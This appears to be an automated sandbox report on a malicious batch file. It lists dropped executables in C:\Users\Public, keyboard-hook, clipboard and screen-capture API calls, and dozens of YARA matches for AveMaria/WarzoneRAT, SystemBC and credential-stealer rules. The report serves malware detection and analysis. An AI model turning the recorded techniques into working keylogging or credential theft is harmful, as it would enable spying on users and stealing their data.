Source: unknown	HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.4:49743 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Users\Public\Libraries\dbkyovyK.pif

Windows user hook set: 0 keyboard low level C:\Users\Public\Libraries\dbkyovyK.pif

Jump to behavior

Source: C:\Users\Public\Libraries\dbkyovyK.pif

Code function: 14_2_39CD92C0 OpenClipboard,

14_2_39CD92C0

Source: C:\Users\Public\Libraries\dbkyovyK.pif

Code function: 14_2_39CD7E50 SetClipboardData,

14_2_39CD7E50

Source: C:\Users\Public\Libraries\dbkyovyK.pif

Code function: 14_2_39CD7D00 GetClipboardData,

14_2_39CD7D00

Source: C:\Users\Public\pointer.com

Code function: 8_2_02D34F70 GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette,

8_2_02D34F70

Source: C:\Users\Public\pointer.com

Code function: 8_2_02D4F0EC GetMessagePos,GetKeyboardState,

8_2_02D4F0EC

Source: pointer.com, 00000008.00000002.1723986250.00000000123C8000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: GetRawInputData

memstr_87d05512-1

E-Banking Fraud

Yara detected AveMaria stealer

Source: Yara match	File source: 14.3.dbkyovyK.pif.2fdf7880.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.dbkyovyK.pif.2fdf6010.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.dbkyovyK.pif.2fde2d40.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.Kyvoykbd.PIF.123a7f18.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.dbkyovyK.pif.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.1.dbkyovyK.pif.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.dbkyovyK.pif.2fdf7880.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.pointer.com.126450d8.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.1.dbkyovyK.pif.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.1.dbkyovyK.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.1.dbkyovyK.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.pointer.com.123c8f48.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.pointer.com.126450d8.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.dbkyovyK.pif.2fde45b0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.Kyvoykbd.PIF.123a7f18.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.dbkyovyK.pif.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.dbkyovyK.pif.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.pointer.com.123c8f48.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.dbkyovyK.pif.2fdf7880.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.dbkyovyK.pif.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000019.00000001.1834966037.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000001.1696850208.000000000041A000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.1846860261.00000000123A7000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1723986250.00000000123C8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1719337894.000000002FDF6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.1696692635.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1719205642.000000002FDE6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1725155820.0000000012645000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.1918637421.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1719249332.000000002FDF6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1719410904.000000002FDE2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1719205642.000000002FDEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000001.1902763804.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\Public\Libraries\dbkyovyK.pif

Code function: 14_2_39D3F7A0 CreateDesktopW,

14_2_39D3F7A0

System Summary

Malicious sample detected (through community Yara rule)

Source: PRODUCT.bat, type: SAMPLE	Matched rule: Koadic post-exploitation framework BAT payload Author: ditekSHen
Source: 8.2.pointer.com.12661d48.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 14.3.dbkyovyK.pif.2fdf7880.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 14.3.dbkyovyK.pif.2fdf7880.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 14.3.dbkyovyK.pif.2fdf7880.2.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 14.3.dbkyovyK.pif.2fdf7880.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 14.3.dbkyovyK.pif.2fdf7880.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects SystemBC Author: ditekSHen
Source: 14.3.dbkyovyK.pif.2fdf6010.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 14.3.dbkyovyK.pif.2fdf6010.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 14.3.dbkyovyK.pif.2fdf6010.0.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 14.3.dbkyovyK.pif.2fdf6010.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 14.3.dbkyovyK.pif.2fdf6010.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 14.3.dbkyovyK.pif.2fdf6010.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 14.3.dbkyovyK.pif.2fdf6010.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects SystemBC Author: ditekSHen
Source: 14.3.dbkyovyK.pif.2fde2d40.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 14.3.dbkyovyK.pif.2fde2d40.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 14.3.dbkyovyK.pif.2fde2d40.4.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 14.3.dbkyovyK.pif.2fde2d40.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 14.3.dbkyovyK.pif.2fde2d40.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 14.3.dbkyovyK.pif.2fde2d40.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 14.3.dbkyovyK.pif.2fde2d40.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects SystemBC Author: ditekSHen
Source: 23.2.Kyvoykbd.PIF.123a7f18.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 23.2.Kyvoykbd.PIF.123a7f18.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 23.2.Kyvoykbd.PIF.123a7f18.2.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 23.2.Kyvoykbd.PIF.123a7f18.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 23.2.Kyvoykbd.PIF.123a7f18.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 23.2.Kyvoykbd.PIF.123a7f18.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 23.2.Kyvoykbd.PIF.123a7f18.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects SystemBC Author: ditekSHen
Source: 14.2.dbkyovyK.pif.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 14.2.dbkyovyK.pif.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 14.2.dbkyovyK.pif.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 14.2.dbkyovyK.pif.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 14.2.dbkyovyK.pif.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects SystemBC Author: ditekSHen
Source: 29.1.dbkyovyK.pif.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 29.1.dbkyovyK.pif.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 29.1.dbkyovyK.pif.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 29.1.dbkyovyK.pif.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 29.1.dbkyovyK.pif.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects SystemBC Author: ditekSHen
Source: 14.3.dbkyovyK.pif.2fdf7880.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 14.3.dbkyovyK.pif.2fdf7880.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 14.3.dbkyovyK.pif.2fdf7880.1.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 14.3.dbkyovyK.pif.2fdf7880.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 14.3.dbkyovyK.pif.2fdf7880.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects SystemBC Author: ditekSHen
Source: 8.2.pointer.com.126450d8.10.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 8.2.pointer.com.126450d8.10.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 8.2.pointer.com.126450d8.10.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 8.2.pointer.com.126450d8.10.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 8.2.pointer.com.126450d8.10.unpack, type: UNPACKEDPE	Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 29.1.dbkyovyK.pif.400000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 29.1.dbkyovyK.pif.400000.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 29.1.dbkyovyK.pif.400000.3.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 29.1.dbkyovyK.pif.400000.3.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 29.1.dbkyovyK.pif.400000.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 29.1.dbkyovyK.pif.400000.3.unpack, type: UNPACKEDPE	Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 29.1.dbkyovyK.pif.400000.3.unpack, type: UNPACKEDPE	Matched rule: Detects SystemBC Author: ditekSHen
Source: 25.1.dbkyovyK.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 25.1.dbkyovyK.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 25.1.dbkyovyK.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 25.1.dbkyovyK.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 25.1.dbkyovyK.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects SystemBC Author: ditekSHen
Source: 25.1.dbkyovyK.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 25.1.dbkyovyK.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 25.1.dbkyovyK.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 25.1.dbkyovyK.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 25.1.dbkyovyK.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 25.1.dbkyovyK.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 25.1.dbkyovyK.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects SystemBC Author: ditekSHen
Source: 8.2.pointer.com.123c8f48.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 8.2.pointer.com.123c8f48.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 8.2.pointer.com.123c8f48.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 8.2.pointer.com.123c8f48.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 8.2.pointer.com.123c8f48.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 8.2.pointer.com.123c8f48.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects SystemBC Author: ditekSHen
Source: 8.2.pointer.com.126450d8.10.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 8.2.pointer.com.126450d8.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 8.2.pointer.com.126450d8.10.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 8.2.pointer.com.126450d8.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 8.2.pointer.com.126450d8.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 8.2.pointer.com.126450d8.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 8.2.pointer.com.126450d8.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects SystemBC Author: ditekSHen
Source: 14.3.dbkyovyK.pif.2fde45b0.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 14.3.dbkyovyK.pif.2fde45b0.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 14.3.dbkyovyK.pif.2fde45b0.5.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 14.3.dbkyovyK.pif.2fde45b0.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 14.3.dbkyovyK.pif.2fde45b0.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects SystemBC Author: ditekSHen
Source: 23.2.Kyvoykbd.PIF.123c4b88.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 23.2.Kyvoykbd.PIF.123a7f18.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 29.2.dbkyovyK.pif.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 29.2.dbkyovyK.pif.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 23.2.Kyvoykbd.PIF.123a7f18.2.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 23.2.Kyvoykbd.PIF.123a7f18.2.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 23.2.Kyvoykbd.PIF.123a7f18.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 23.2.Kyvoykbd.PIF.123a7f18.2.unpack, type: UNPACKEDPE	Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 8.2.pointer.com.123e5bb8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 14.2.dbkyovyK.pif.400000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 29.2.dbkyovyK.pif.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 14.2.dbkyovyK.pif.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 29.2.dbkyovyK.pif.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 14.2.dbkyovyK.pif.400000.1.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 14.2.dbkyovyK.pif.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 29.2.dbkyovyK.pif.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects SystemBC Author: ditekSHen
Source: 14.2.dbkyovyK.pif.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 14.2.dbkyovyK.pif.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 14.2.dbkyovyK.pif.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects SystemBC Author: ditekSHen
Source: 8.2.pointer.com.123c8f48.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 8.2.pointer.com.123c8f48.5.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 8.2.pointer.com.123c8f48.5.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 8.2.pointer.com.123c8f48.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 8.2.pointer.com.123c8f48.5.unpack, type: UNPACKEDPE	Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 14.3.dbkyovyK.pif.2fdf7880.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 14.3.dbkyovyK.pif.2fdf7880.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 14.3.dbkyovyK.pif.2fdf7880.3.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 14.3.dbkyovyK.pif.2fdf7880.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 14.3.dbkyovyK.pif.2fdf7880.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects SystemBC Author: ditekSHen
Source: 29.2.dbkyovyK.pif.400000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 29.2.dbkyovyK.pif.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 29.2.dbkyovyK.pif.400000.1.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 29.2.dbkyovyK.pif.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 29.2.dbkyovyK.pif.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 29.2.dbkyovyK.pif.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 29.2.dbkyovyK.pif.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects SystemBC Author: ditekSHen
Source: 00000019.00000001.1834966037.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 00000019.00000001.1834966037.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000019.00000001.1834966037.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: AveMaria_WarZone Author: unknown
Source: 00000019.00000001.1834966037.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 00000019.00000001.1834966037.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects SystemBC Author: ditekSHen
Source: 0000000E.00000001.1696850208.000000000041A000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 00000017.00000002.1846860261.00000000123A7000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 00000008.00000002.1723986250.00000000123C8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 0000000E.00000003.1719337894.000000002FDF6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 00000008.00000003.1696692635.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: AveMaria_WarZone Author: unknown
Source: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects SystemBC Author: ditekSHen
Source: 0000000E.00000003.1719205642.000000002FDE6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 00000008.00000002.1725155820.0000000012645000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 0000001D.00000002.1918637421.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 0000001D.00000002.1918637421.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0000001D.00000002.1918637421.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: AveMaria_WarZone Author: unknown
Source: 0000001D.00000002.1918637421.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 0000001D.00000002.1918637421.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects SystemBC Author: ditekSHen
Source: 0000000E.00000003.1719249332.000000002FDF6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 0000000E.00000003.1719410904.000000002FDE2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 0000000E.00000003.1719205642.000000002FDEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 0000001D.00000001.1902763804.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 0000001D.00000001.1902763804.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0000001D.00000001.1902763804.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: AveMaria_WarZone Author: unknown
Source: 0000001D.00000001.1902763804.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 0000001D.00000001.1902763804.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects SystemBC Author: ditekSHen

Found large BAT file

Source: PRODUCT.bat

Static file information: 2701509

Source: C:\Users\Public\pointer.com	Code function: 8_2_02D6CA60 InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,CreateProcessAsUserW,NtQueueApcThread,ResumeThread,CloseHandle,CopyFileA,GetCurrentProcess,ExitProcess,	8_2_02D6CA60
Source: C:\Users\Public\pointer.com	Code function: 8_2_02D6B630 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,	8_2_02D6B630
Source: C:\Users\Public\pointer.com	Code function: 8_2_02D6B714 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,	8_2_02D6B714
Source: C:\Users\Public\pointer.com	Code function: 8_2_02D6B5A8 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	8_2_02D6B5A8
Source: C:\Users\Public\pointer.com	Code function: 8_2_02D2FB88 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,	8_2_02D2FB88
